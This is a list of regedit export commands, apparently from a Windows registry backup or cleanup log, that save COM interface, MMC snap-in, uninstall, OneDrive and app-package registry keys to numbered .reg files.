/e "794.reg" "HKEY_CLASSES_ROOT\Interface\{30510720-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "795.reg" "HKEY_CLASSES_ROOT\Interface\{30510736-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "796.reg" "HKEY_CLASSES_ROOT\Interface\{30510731-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "797.reg" "HKEY_CLASSES_ROOT\Interface\{30510722-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "798.reg" "HKEY_CLASSES_ROOT\Interface\{3051074E-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "799.reg" "HKEY_CLASSES_ROOT\Interface\{30590072-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "800.reg" "HKEY_CLASSES_ROOT\Interface\{30590071-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "801.reg" "HKEY_CLASSES_ROOT\Interface\{30590070-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "802.reg" "HKEY_CLASSES_ROOT\Interface\{30590073-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "803.reg" "HKEY_CLASSES_ROOT\Interface\{30590076-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "804.reg" "HKEY_CLASSES_ROOT\Interface\{30590075-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "805.reg" "HKEY_CLASSES_ROOT\Interface\{30590074-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "806.reg" "HKEY_CLASSES_ROOT\Interface\{30590034-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "807.reg" "HKEY_CLASSES_ROOT\Interface\{30510760-98B6-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "808.reg" "HKEY_CLASSES_ROOT\Interface\{30510752-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "809.reg" "HKEY_CLASSES_ROOT\Interface\{30510750-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "810.reg" "HKEY_CLASSES_ROOT\Interface\{30510761-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "811.reg" "HKEY_CLASSES_ROOT\Interface\{30590033-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "812.reg" "HKEY_CLASSES_ROOT\Interface\{30510765-98B6-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "813.reg" "HKEY_CLASSES_ROOT\Interface\{30510763-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "814.reg" "HKEY_CLASSES_ROOT\Interface\{0AAEDF0B-D333-4B27-A0C6-BBF31413A42E}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "815.reg" "HKEY_CLASSES_ROOT\Interface\{0d4e4444-cb20-4c2b-b8b2-94e5656ecae8}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "816.reg" "HKEY_CLASSES_ROOT\Interface\{08A9E040-9A9C-4F42-B5F5-2029B8F17E1D}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "817.reg" "HKEY_CLASSES_ROOT\Interface\{08A9E040-9A9C-4F42-B5F5-2029B8F17E1D}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "818.reg" "HKEY_CLASSES_ROOT\Interface\{0f872661-c863-47a4-863f-c065c182858a}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "819.reg" "HKEY_CLASSES_ROOT\Interface\{10C9242E-D604-49B5-99E4-BF87945EF86C}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "820.reg" "HKEY_CLASSES_ROOT\Interface\{0d4e4444-cb20-4c2b-b8b2-94e5656ecae8}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "821.reg" "HKEY_CLASSES_ROOT\Interface\{0f872661-c863-47a4-863f-c065c182858a}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "822.reg" "HKEY_CLASSES_ROOT\Interface\{049FED7E-C3EA-4B66-9D92-10E8085D60FB}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "823.reg" "HKEY_CLASSES_ROOT\Interface\{049FED7E-C3EA-4B66-9D92-10E8085D60FB}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "824.reg" "HKEY_CLASSES_ROOT\Interface\{03C2AEA5-BEFA-4C84-A187-C9245AC784F6}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "825.reg" "HKEY_CLASSES_ROOT\Interface\{03C2AEA5-BEFA-4C84-A187-C9245AC784F6}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "826.reg" "HKEY_CLASSES_ROOT\Interface\{0776ae27-5ab9-4e18-9063-1836da63117a}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "827.reg" "HKEY_CLASSES_ROOT\Interface\{08A9E040-9A9C-4F42-B5F5-2029B8F17E1D}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "828.reg" "HKEY_CLASSES_ROOT\Interface\{066ACBCA-8881-49C9-BB98-FAE16B4889E1}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "829.reg" "HKEY_CLASSES_ROOT\Interface\{0776ae27-5ab9-4e18-9063-1836da63117a}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "830.reg" "HKEY_CLASSES_ROOT\Interface\{10C9242E-D604-49B5-99E4-BF87945EF86C}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "831.reg" "HKEY_CLASSES_ROOT\Interface\{000C172F-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "832.reg" "HKEY_CLASSES_ROOT\Interface\{000C1731-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "833.reg" "HKEY_CLASSES_ROOT\Interface\{000C1728-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "834.reg" "HKEY_CLASSES_ROOT\Interface\{000C1730-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "835.reg" "HKEY_CLASSES_ROOT\Interface\{143C8DCB-D37F-47F7-88E8-6B1D21F2C5F7}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "836.reg" "HKEY_CLASSES_ROOT\Interface\{14E469E0-BF61-11CF-8385-8F69D8F1350B}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "837.reg" "HKEY_CLASSES_ROOT\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "838.reg" "HKEY_CLASSES_ROOT\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "839.reg" "HKEY_CLASSES_ROOT\Interface\{000C172E-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "840.reg" "HKEY_CLASSES_ROOT\Interface\{000C172D-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "841.reg" "HKEY_CLASSES_ROOT\Interface\{10EF4AB3-4FAA-46C3-8832-B6247F0CF15C}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "842.reg" "HKEY_CLASSES_ROOT\Interface\{10EF4AB3-4FAA-46C3-8832-B6247F0CF15C}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "843.reg" "HKEY_CLASSES_ROOT\Interface\{000C172A-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "844.reg" "HKEY_CLASSES_ROOT\Interface\{000C1729-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "845.reg" "HKEY_CLASSES_ROOT\Interface\{000C172C-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "846.reg" "HKEY_CLASSES_ROOT\Interface\{000C172B-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "847.reg" "HKEY_CLASSES_ROOT\Interface\{02C98E2C-6C9F-49F8-9B57-3A6E1AA09A67}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "848.reg" "HKEY_CLASSES_ROOT\Interface\{000CD902-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "849.reg" "HKEY_CLASSES_ROOT\Interface\{000CD903-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "850.reg" "HKEY_CLASSES_ROOT\Interface\{000CD900-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "851.reg" "HKEY_CLASSES_ROOT\Interface\{000CD901-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "852.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB02-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "853.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB03-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "854.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB00-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "855.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB01-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "856.reg" "HKEY_CLASSES_ROOT\Interface\{000CD102-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "857.reg" "HKEY_CLASSES_ROOT\Interface\{000CD6A1-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "858.reg" "HKEY_CLASSES_ROOT\Interface\{000CD100-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "859.reg" "HKEY_CLASSES_ROOT\Interface\{000CD101-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "860.reg" "HKEY_CLASSES_ROOT\Interface\{000CD706-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "861.reg" "HKEY_CLASSES_ROOT\Interface\{000CD809-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "862.reg" "HKEY_CLASSES_ROOT\Interface\{000CD6A2-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "863.reg" "HKEY_CLASSES_ROOT\Interface\{000CD6A3-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "864.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB04-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "865.reg" "HKEY_CLASSES_ROOT\Interface\{00F20E90-2168-4CAB-A8E0-C7D0029965E6}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "866.reg" "HKEY_CLASSES_ROOT\Interface\{00FFD6C4-1A94-44BC-AD3E-8AC18552E3E6}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "867.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB10-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "868.reg" "HKEY_CLASSES_ROOT\Interface\{00194002-D9C3-11D3-8D59-0050048384E3}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "869.reg" "HKEY_CLASSES_ROOT\Interface\{0299ECA9-80B6-43C8-A79A-FB1C5F19E7D8}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "870.reg" "HKEY_CLASSES_ROOT\Interface\{02C98E2C-6C9F-49F8-9B57-3A6E1AA09A67}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "871.reg" "HKEY_CLASSES_ROOT\Interface\{00FFD6C4-1A94-44BC-AD3E-8AC18552E3E6}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "872.reg" "HKEY_CLASSES_ROOT\Interface\{0299ECA9-80B6-43C8-A79A-FB1C5F19E7D8}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "873.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB07-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "874.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB09-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "875.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB05-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "876.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB06-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "877.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB0E-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "878.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB0F-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "879.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB0A-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "880.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB0B-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "881.reg" "HKEY_CLASSES_ROOT\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "882.reg" "HKEY_CLASSES_ROOT\Interface\{214685F6-7B78-4681-87E0-495F739273D1}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "883.reg" "HKEY_CLASSES_ROOT\Interface\{2387C6BD-9A36-41A2-88ED-FF731E529384}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "884.reg" "HKEY_CLASSES_ROOT\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "885.reg" "HKEY_CLASSES_ROOT\Interface\{2072838A-316F-467A-A949-27F68C44A854}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "886.reg" "HKEY_CLASSES_ROOT\Interface\{2A792539-9CEA-4A63-A80A-A645FEF2046A}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "887.reg" "HKEY_CLASSES_ROOT\Interface\{1EDD003E-C446-43C5-8BA0-3778CC4792CC}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "888.reg" "HKEY_CLASSES_ROOT\Interface\{2A792539-9CEA-4A63-A80A-A645FEF2046A}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "889.reg" "HKEY_CLASSES_ROOT\Interface\{1F6342F2-D848-42E3-8995-C10A9EF9A3BA}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "890.reg" "HKEY_CLASSES_ROOT\Interface\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "891.reg" "HKEY_CLASSES_ROOT\Interface\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "892.reg" "HKEY_CLASSES_ROOT\Interface\{24785B20-135E-11D1-A2A7-00A0C9082766}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "893.reg" "HKEY_CLASSES_ROOT\Interface\{24785B20-135E-11D1-A2A7-00A0C9082766}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "894.reg" "HKEY_CLASSES_ROOT\Interface\{2A1C53C4-8638-4B3E-B518-2773C94556A3}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "895.reg" "HKEY_CLASSES_ROOT\Interface\{239D58CC-793C-4B64-8320-B51380087C0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "896.reg" "HKEY_CLASSES_ROOT\Interface\{2387C6BD-9A36-41A2-88ED-FF731E529384}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "897.reg" "HKEY_CLASSES_ROOT\Interface\{24785B20-135E-11D1-A2A7-00A0C9082766}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "898.reg" "HKEY_CLASSES_ROOT\Interface\{23ADBB16-0133-4906-B29A-1DCE1D026379}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "899.reg" "HKEY_CLASSES_ROOT\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "900.reg" "HKEY_CLASSES_ROOT\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "901.reg" "HKEY_CLASSES_ROOT\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "902.reg" "HKEY_CLASSES_ROOT\Interface\{2D719729-5333-406C-BF12-8DE787FD65E3}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "903.reg" "HKEY_CLASSES_ROOT\Interface\{198F17AE-B921-4308-9543-288D426A5C2B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "904.reg" "HKEY_CLASSES_ROOT\Interface\{18987285-971B-4C88-AEA9-2A5600861BA5}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "905.reg" "HKEY_CLASSES_ROOT\Interface\{14E469E0-BF61-11CF-8385-8F69D8F1350B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "906.reg" "HKEY_CLASSES_ROOT\Interface\{198F17AE-B921-4308-9543-288D426A5C2B}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "907.reg" "HKEY_CLASSES_ROOT\Interface\{18987285-971B-4C88-AEA9-2A5600861BA5}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "908.reg" "HKEY_CLASSES_ROOT\Interface\{2CE46480-1A08-11CF-AD63-00AA00614F3E}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "909.reg" "HKEY_CLASSES_ROOT\Interface\{1E9B00E4-9846-11D1-A1EE-00C04FC2FBE1}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "910.reg" "HKEY_CLASSES_ROOT\Interface\{2CE46480-1A08-11CF-AD63-00AA00614F3E}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "911.reg" "HKEY_CLASSES_ROOT\Interface\{1EDD003E-C446-43C5-8BA0-3778CC4792CC}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "912.reg" "HKEY_CLASSES_ROOT\Interface\{2CE4D4CF-B278-4126-AD1E-B622DA2E8339}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "913.reg" "HKEY_CLASSES_ROOT\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "914.reg" "HKEY_CLASSES_ROOT\Interface\{2CE4D4CF-B278-4126-AD1E-B622DA2E8339}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "915.reg" "HKEY_CLASSES_ROOT\Interface\{1D12BD3F-89B6-4077-AA2C-C9DC2BCA42F9}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "916.reg" "HKEY_CLASSES_ROOT\Interface\{2CE4D4CF-B278-4126-AD1E-B622DA2E8339}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "917.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs"
C:\Windows\SysWOW64\regedit.exe
/e "918.reg" "HKEY_LOCAL_MACHINE\Software\Microsoft\MMC\SnapIns\FX:{b05566ae-fe9c-4363-be05-7a4cbb7cb510}"
C:\Windows\SysWOW64\regedit.exe
/e "919.reg" "HKEY_LOCAL_MACHINE\Software\Microsoft\MMC\SnapIns\FX:{b05566ad-fe9c-4363-be05-7a4cbb7cb510}"
C:\Windows\SysWOW64\regedit.exe
/e "920.reg" "HKEY_LOCAL_MACHINE\Software\Microsoft\MMC\SnapIns\FX:{c7b8fb07-bfe1-4c2e-9217-7a69a95bbac4}"
C:\Windows\SysWOW64\regedit.exe
/e "921.reg" "HKEY_LOCAL_MACHINE\Software\Microsoft\MMC\SnapIns\FX:{c7b8fb06-bfe1-4c2e-9217-7a69a95bbac4}"
C:\Windows\SysWOW64\regedit.exe
/e "922.reg" "HKEY_LOCAL_MACHINE\Software\Microsoft\MMC\SnapIns\FX:{7d3830aa-e69e-4e17-8bd1-1b87b97099da}"
C:\Windows\SysWOW64\regedit.exe
/e "923.reg" "HKEY_LOCAL_MACHINE\Software\Microsoft\MMC\SnapIns\FX:{b05566ac-fe9c-4368-be01-7a4cbb6cba12}"
C:\Windows\SysWOW64\regedit.exe
/e "924.reg" "HKEY_LOCAL_MACHINE\Software\Microsoft\MMC\SnapIns\FX:{b05566ac-fe9c-4368-be02-7a4cbb7cbe11}"
C:\Windows\SysWOW64\regedit.exe
/e "925.reg" "HKEY_LOCAL_MACHINE\Software\Microsoft\MMC\SnapIns\FX:{b05566ac-fe9c-4368-be01-7a4cbb6cba13}"
C:\Windows\SysWOW64\regedit.exe
/e "926.reg" "HKEY_CLASSES_ROOT\Extensions\ContractId\Windows.Protocol\PackageId\Windows.PrintDialog_6.2.1.0_neutral_neutral_cw5n1h2txyewy\ActivatableClassId\Microsoft.Windows.PrintDialog.AppXw37yn3dbfh0h80cd54t676ex3d8ew3wk.mca"
C:\Windows\SysWOW64\regedit.exe
/e "927.reg" "HKEY_CLASSES_ROOT\Extensions\ContractId\Windows.Protocol\PackageId\Windows.PrintDialog_6.2.1.0_neutral_neutral_cw5n1h2txyewy\ActivatableClassId\Microsoft.Windows.PrintDialog.AppXqnst4nt1wwwjx56bzf1wpwyn56fzmp3d.mca"
C:\Windows\SysWOW64\regedit.exe
/e "928.reg" "HKEY_CLASSES_ROOT\Extensions\ContractId\Windows.BackgroundTasks\PackageId\Windows.PrintDialog_6.2.1.0_neutral_neutral_cw5n1h2txyewy\ActivatableClassId\Microsoft.Windows.PrintDialog.AppX6fe08qd05jq9n5xymcarszkywdk3r16w.mca"
C:\Windows\SysWOW64\regedit.exe
/e "929.reg" "HKEY_CLASSES_ROOT\Extensions\ContractId\Windows.BackgroundTasks\PackageId\Windows.PrintDialog_6.2.1.0_neutral_neutral_cw5n1h2txyewy\ActivatableClassId\Microsoft.Windows.PrintDialog.AppXskcrzs22qh136w607wsfv5z9v35zx4r5.mca"
C:\Windows\SysWOW64\regedit.exe
/e "930.reg" "HKEY_CLASSES_ROOT\Extensions\ContractId\Windows.BackgroundTasks\PackageId\Windows.PrintDialog_6.2.1.0_neutral_neutral_cw5n1h2txyewy\ActivatableClassId\Microsoft.Windows.PrintDialog.AppXv42rtrb1mc702dzsntwk7td5q0r8d235.mca"
C:\Windows\SysWOW64\regedit.exe
/e "931.reg" "HKEY_CURRENT_USER\Software\Microsoft\OneDrive\18.151.0729.0013"
C:\Windows\SysWOW64\regedit.exe
/e "932.reg" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}"
C:\Windows\SysWOW64\regedit.exe
/e "933.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.MicrosoftEdge_44.22000.120.0_neutral__8wekyb3d8bbwe\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge\windows.protocol\http"
C:\Windows\SysWOW64\regedit.exe
/e "934.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.MicrosoftEdge_44.22000.120.0_neutral__8wekyb3d8bbwe\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge\windows.protocol\https"
C:\Windows\SysWOW64\regedit.exe
/e "935.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.WindowsFeedbackHub_1.2103.1172.0_x64__8wekyb3d8bbwe\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe!App\windows.fileTypeAssociation\.fh"
C:\Windows\SysWOW64\regedit.exe
/e "936.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.MicrosoftEdge_44.22000.120.0_neutral__8wekyb3d8bbwe\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge\windows.fileTypeAssociation\.svg"
C:\Windows\SysWOW64\regedit.exe
/e "937.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.MicrosoftEdge_44.22000.120.0_neutral__8wekyb3d8bbwe\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge\windows.protocol\read"
C:\Windows\SysWOW64\regedit.exe
/e "938.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.MicrosoftEdge_44.22000.120.0_neutral__8wekyb3d8bbwe\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge\windows.protocol\ms-xbl-3d8b930f"
C:\Windows\SysWOW64\regedit.exe
/e "939.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.MicrosoftEdge_44.22000.120.0_neutral__8wekyb3d8bbwe\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge\windows.protocol\microsoft-edge"
C:\Windows\SysWOW64\regedit.exe
/e "940.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.MicrosoftEdge_44.22000.120.0_neutral__8wekyb3d8bbwe\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge\windows.protocol\microsoft-edge-holographic"
C:\Windows\SysWOW64\regedit.exe
/e "941.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Windows.PrintDialog_6.2.1.0_neutral_neutral_cw5n1h2txyewy\Windows.PrintDialog_cw5n1h2txyewy!Microsoft.Windows.PrintDialog\windows.protocol\ms-print-printjobs"
C:\Windows\SysWOW64\regedit.exe
/e "942.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Windows.PrintDialog_6.2.1.0_neutral_neutral_cw5n1h2txyewy\Windows.PrintDialog_cw5n1h2txyewy!Microsoft.Windows.PrintDialog\windows.protocol\ms-print-addprinter"
C:\Windows\SysWOW64\regedit.exe
/e "943.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.MicrosoftEdge_44.22000.120.0_neutral__8wekyb3d8bbwe\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge\windows.fileTypeAssociation\.htm"
C:\Windows\SysWOW64\regedit.exe
/e "944.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.MicrosoftEdge_44.22000.120.0_neutral__8wekyb3d8bbwe\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge\windows.fileTypeAssociation\.pdf"
